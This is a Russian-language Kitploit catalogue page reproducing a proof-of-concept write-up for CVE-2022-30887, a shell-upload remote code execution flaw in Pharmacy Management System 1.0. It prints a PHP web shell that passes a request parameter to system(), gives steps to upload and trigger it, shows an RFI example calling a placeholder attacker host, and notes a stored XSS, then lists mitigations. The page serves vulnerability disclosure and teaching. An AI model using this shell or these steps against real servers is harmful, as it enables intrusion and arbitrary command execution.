Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-30887 — Эксплойт-доказательство концепции для CVE-2022-30887, демонстрирующий удаленное выполнение кода через загрузку файла в Pharmacy Management System 1.0, с рекомендациями по смягчению последствий. | Kitploit
Инструменты/GitHubGitHub/sonerctnkya/cve-2022-30887
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubsonerctnkya/cve-2022-30887

CVE-2022-30887

Эксплойт-доказательство концепции для CVE-2022-30887, демонстрирующий удаленное выполнение кода через загрузку файла в Pharmacy Management System 1.0, с рекомендациями по смягчению последствий.

Репозиторий
2454 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-30887

Pharmacy Management System 1.0 Shell Upload

Это приложение создано Mayurik Проект системы управления аптекой на PHP был разработан для повышения точности и эффективности работы аптек за счет безопасности и управления. Короче говоря, это приложение для инвентаризации товаров.

В Pharmacy Management System v1.0 была обнаружена уязвимость удаленного выполнения кода (RCE) через компонент "/php_action/editProductImage.php". Эта уязвимость позволяет злоумышленникам выполнять произвольный код через специально созданный файл изображения.

Что такое атака с включением файлов

Уязвимости загрузки файлов — это обычно уязвимости, которые позволяют выполнить скрипт. Они срабатывают, когда мы загружаем файл на сервер и вводим команду в загруженный файл. Уязвимости загрузки файлов делятся на два типа;

  • LFI (Local File Inclusion)
  • RFI (Remote File Inclusion)

LFI (Local File Inclusion)

Эта уязвимость возникает, когда локальные файлы на сервере включают файл, полученный от пользователя. Значения, полученные от пользователя, должны быть обезврежены.

Пример LFI (Local File Inclusion) ;

root@kitploit:~
<?php
if($_REQUEST['s'])
 {  
 system($_REQUEST['s']);
 } 
 else
  phpinfo();?>

RFI (Remote File Inclusion)

Эта уязвимость срабатывает, когда злоумышленник загружает вредоносное ПО с удаленного сервера.

Пример RFI (Remote File Inclusion) ;

"www.victim_site.com/abc.php?test=http://www.attacker_site.com/attack_page"

Объяснение эксплойта, PoC

  • Сначала после страницы входа мы перейдем на "dashboar.php"
  • Во-вторых, чтобы перейти на страницу, где была обнаружена уязвимость, нажмите "Лекарства" в меню, затем нажмите "Управление лекарствами", вы перейдете на "product.php" и нажмите "Редактировать изображение" под вкладкой действий

Товар

  • На странице "editproduct.php" нажмите кнопку выбора фото и загрузите ваш скрипт-оболочку.

Пример PHP скрипта-оболочки;

root@kitploit:~
<?php
if($_REQUEST['s'])
 {  
 system($_REQUEST['s']);
 } 
 else
  phpinfo();?>
  • Нажмите кнопку сохранения и перехватите запрос в burp suite

Запрос;

Запрос

Ответ;

Ответ

  • Файл загружается в папку "/assets/myimage/"
  • Выполните запрос для запуска вашего скрипта по URL /assets/myimage/shell.php?s=echo+%22MuallimNaci%22

Запрос;

Запрос

Ответ;

Ответ

Ответ

  • И БУМ

Также эта уязвимость все еще активна в приложении.

Меры предотвращения

  • убедитесь, что вы принимаете только символы "a-Z0-9" и не допускаете "..", "/" или "%00" (нулевой байт)
  • Убедитесь, что "флаг allow_url_include" должен быть выключен
  • согласно рекомендациям OWASP Top 10; "Приложение может вести белый список файлов, которые могут быть включены страницей, а затем использовать идентификатор (например, номер индекса) для доступа к выбранному файлу. Любой запрос, содержащий недействительный идентификатор, должен быть отклонен, таким образом, у злоумышленников не будет поверхности атаки для манипулирования путем."

Дополнительно

На той же странице "editproduct.php" я нашел хранимый XSS

  • Код, содержащий уязвимость:
root@kitploit:~
$sql = "UPDATE product SET product_name = '$productName'

В этом блоке кода вы можете выйти из контекста с помощью двойных кавычек (")

Запрос;

Запрос

Ответ;

Ответ

Ответ

Заключение

Я надеюсь, что смог рассказать, как работает уязвимость включения файлов, какая ситуация вызывает эту уязвимость и как предотвратить эту атаку со стороны злоумышленников. Спасибо за ваше драгоценное время.

Скачать инструмент